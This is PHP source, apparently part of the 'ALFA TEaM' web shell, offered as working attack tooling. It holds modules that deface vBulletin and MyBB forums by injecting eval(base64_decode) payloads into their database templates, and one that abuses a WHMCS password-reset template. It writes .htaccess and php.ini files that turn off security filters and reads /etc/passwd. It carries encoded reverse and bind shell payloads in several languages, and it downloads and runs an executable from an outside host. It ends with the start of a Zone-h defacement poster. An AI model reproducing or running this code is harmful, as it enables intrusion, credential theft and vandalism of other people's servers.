$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
if(function_exists('curl_version')){
$AlfaSole = new AlfaCURL(true);
$saveurl = $AlfaSole->Send($path."/pwreset.php");
$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
__alert('File Created...');
echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
}else{
echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
}}}}
if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
echo __pre();

echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
<p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo "<br><div class='txtfont'>| Your Index |</div><br>
<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
<input type='submit' value=' '></form></center></center>";
if($_POST['alfa8']=='>>'){
$s0levisible="Powered By Solevisible";
$dbu = $_POST['alfa2'];
$dbn = $_POST['alfa3'];
$dbp = $_POST['alfa4'];
$dbh = $_POST['alfa5'];
$index = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= __ZW5jb2Rlcg("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}";
if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
@mysqli_query($conn,$loli1) or die (mysqli_error($conn));
@mysqli_query($conn,$loli2) or die (mysqli_error($conn));
@mysqli_query($conn,$loli3) or die (mysqli_error($conn));
__alert('VB index changed...!');
}
}
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
echo __pre();

echo "<center><center><div class='txtfont_header'>| Mybb |</div>
<p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo "<br><div class='txtfont'>| Your Index |</div><br>
<textarea name=mybbindex rows='19' cols='103'>
<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
if(isset($_POST['alfa6'])){
$mybb_dbh = $_POST['alfa6'];
$mybb_dbu = $_POST['alfa7'];
$mybb_dbn = $_POST['alfa8'];
$mybb_dbp = $_POST['alfa9'];
$mybb_index = $_POST['alfa10'];
if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
$prefix="mybb_";
$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
__alert('MyBB index changed...!');
}
}
}
echo "</div>";
alfafooter();
}
function alfaproc()
{
alfahead();
echo "<Div class=header><br><center>";
if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
if($GLOBALS['sys']=="win"){
$process=array(
"Task List" =>"tasklist /V",
"System Info" =>"systeminfo",
"Active Connections" => "netstat -an",
"Running Services" => "net start",
"User Accounts" => "net user",
"Show Computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);}else{
$process=array(
"Process status" => "ps aux",
"Syslog" =>"cat /etc/syslog.conf",
"Resolv" => "cat /etc/resolv.conf",
"Hosts" =>"cat /etc/hosts",
"Cpuinfo"=>"cat /proc/cpuinfo",
"Version"=>"cat /proc/version",
"Sbin"=>"ls -al /usr/sbin",
"Interrupts"=>"cat /proc/interrupts",
"lsattr"=>"lsattr -va",
"Uptime"=>"uptime",
"Fstab" =>"cat /etc/fstab"
);}
foreach($process as $n => $link){
echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
}
echo "</center><br>";
if(!empty($_POST['alfa1'])){
echo "<pre class='ml1' style='margin-top:5px' >";
if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
echo alfaEx($cmd.$_POST['alfa1']);
echo '</pre>';
}
echo "</div>";
alfafooter();
}
function alfasafe(){
alfahead();
echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
if(!_alfa_file_exists("/etc/virtual/domainowners")){
echo __pre();
$solevisible9 = _alfa_file('/etc/named.conf');
if(is_array($solevisible9)){
foreach($solevisible9 as $solevisible13){
if(@eregi('zone',$solevisible13)){
preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
if(strlen(trim($solevisible14[1][0])) > 2){
echo $solevisible14[1][0].'<br>';
}}}
}
}else{
echo __pre();
$users = _alfa_file("/etc/virtual/domainowners");
if(is_array($users)){
foreach($users as $boz){
$dom = explode(":",$boz);
echo $dom[0]."\n";}}}}
if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
echo '
<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
if(!_alfa_file_exists("/etc/virtual/domainowners")){
$site = trim($_POST['alfa7']);
$rep = str_replace(array("https://","http://","www."),"",$site);
$user = "";
if(function_exists("posix_getpwuid") && function_exists("fileowner")){
	if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
		$user = $user['name'];
	}
}else{
	if(_alfa_can_runCommand(true,true)){
		$user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
	}
}
if(!empty($user)&&$user!='root'){
echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
}else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
}else{
$site = trim($_POST['alfa7']);
$rep = str_replace(array("https://","http://","www."),"",$site);
$users = _alfa_file("/etc/virtual/domainowners");
foreach($users as $boz){
$ex = explode(":",$boz);
if($ex[0] == $rep){
echo __pre()."<center><table border='1'>
<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
if(!_alfa_file_exists("/etc/virtual/domainowners")){
echo __pre();
$i = 0;
while ($i < 60000) {
$line = @posix_getpwuid($i);
if (!empty($line)) {
while (list ($key, $vl) = each($line)){
echo $vl."\n";
break;}}$i++;}
}else{echo __pre();
$users = _alfa_file("/etc/virtual/domainowners");
foreach($users as $boz){
$user = explode(":",$boz);
echo trim($user[1]).'<br>';}}}
if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
echo __pre();
if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
for($uid=0;$uid<60000;$uid++){
$ara = @posix_getpwuid($uid);
if(!empty($ara)){
while(list ($key, $val) = each($ara)){
echo "$val:";
}echo "\n";}}
}else{__alert('failed...');}}
if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
}
if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
echo '<center><b><big> php.ini created...!</center></b></big>';
}
if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
}
echo "<br></div>";
alfafooter();
}
function __get_resource($content){
return @gzinflate(__ZGVjb2Rlcg($content));
}
function __write_file($file, $content){
if($fh = @fopen($file, "wb")){
if(fwrite($fh, $content)!==false) return true;
}
return false;
}
function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
$res = "<font color='green'>[ Success...! ]</font>";
$err = "<font color='red'>[ Failed...! ]</font>";
if($evalOptions!="") $evalOptions = $evalOptions." ";
if($evalArguments!="") $evalArguments = " ".$evalArguments;
if($evalType=="c"){
$tmpdir = ALFA_TEMPDIR;
chdir($tmpdir);
if(is_writable($tmpdir)){
$uniq = substr(md5(time()),0,8);
$filename = $evalType.$uniq.".c";
$path = $filename;
if(__write_file($path, $evalCode)){
$ext = ($GLOBALS['sys']=='win')? ".exe":".out";
$pathres = $filename.$ext;
$evalOptions = "-o ".$pathres." ".$evalOptions;
$cmd = "gcc ".$evalOptions.$path;
alfaEx($cmd);
if(is_file($pathres)){
if(chmod($pathres, 0755)){
$cmd = $pathres.$evalArguments;
alfaEx($cmd);
}else{$res = $err;}
unlink($pathres);
}else{$res = $err;}
unlink($path);
}else{$res = $err;}
}
return $res;
}elseif($evalType=="java"){
$tmpdir = ALFA_TEMPDIR;
chdir($tmpdir);
if(is_writable($tmpdir)){
if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
$classname = trim($r[1]);
$filename = $classname;
}else{
$uniq = substr(md5(time()),0,8);
$filename = $evalType.$uniq;
$evalCode = "class ".$filename." { ".$evalCode . " } ";
}
$path = $filename.".java";
if(__write_file($path, $evalCode)){
$cmd = "javac ".$evalOptions.$path;
alfaEx($cmd);
$pathres = $filename.".class";
if(is_file($pathres)){
if(chmod($pathres, 0755)){
$cmd = "java ".$filename.$evalArguments;
alfaEx($cmd);
}else{$res = $err;}
unlink($pathres);
}else{$res = $err;}
unlink($path);
}else{$res = $err;}
}
return $res;
}
return false;
}
function alfaconnect(){
alfahead();
$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
$lang = $_POST['alfa1'];
$ip = $_POST['alfa2'];
$port = $_POST['alfa3'];
$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
$tmpdir = ALFA_TEMPDIR;
$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
$allow = array('perl','ruby','python','node');
eval('$lan=$'.$lang.';');
if(in_array($lang,$allow)){
if(__write_file($name,__get_resource($lan))){
if(_alfa_can_runCommand(true,true)){
$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
$out = alfaEx("$lang $name $arg $os");
if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
}
}else{
echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
}
}
if($lang=='java'||$lang=='c'){
$code = __get_resource($lan);
$out = nl2br(bcinit($lang, $code,'',''));
echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
}
if($lang=='bcwin'){
$alfa = new AlfaCURL();
$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
$tmpdir = ALFA_TEMPDIR;
$f = @fopen($tmpdir.'/bcwin.exe','w+');
@fwrite($f, $s);
@fclose($f);
$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
}
if($lang=='php'){
echo "<pre class=ml1 style='margin-top:5px'>";
$code = __get_resource($lan);
if($code!==false){
$code = "\$target = \"".$arg."\";\n".$code;
eval($code);
echo("<center><font color='green'>[ Finished...! ]</font></center>");
}
echo "</pre>";
}
}
echo "</div>";
alfafooter();
}
function alfazoneh(){
alfahead();
echo '<div class=header>';
if(!function_exists('curl_version')){
echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
}
$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
echo '
<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
<form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
<br>
<select id="text" name="hackmode" style="width:400px;">';
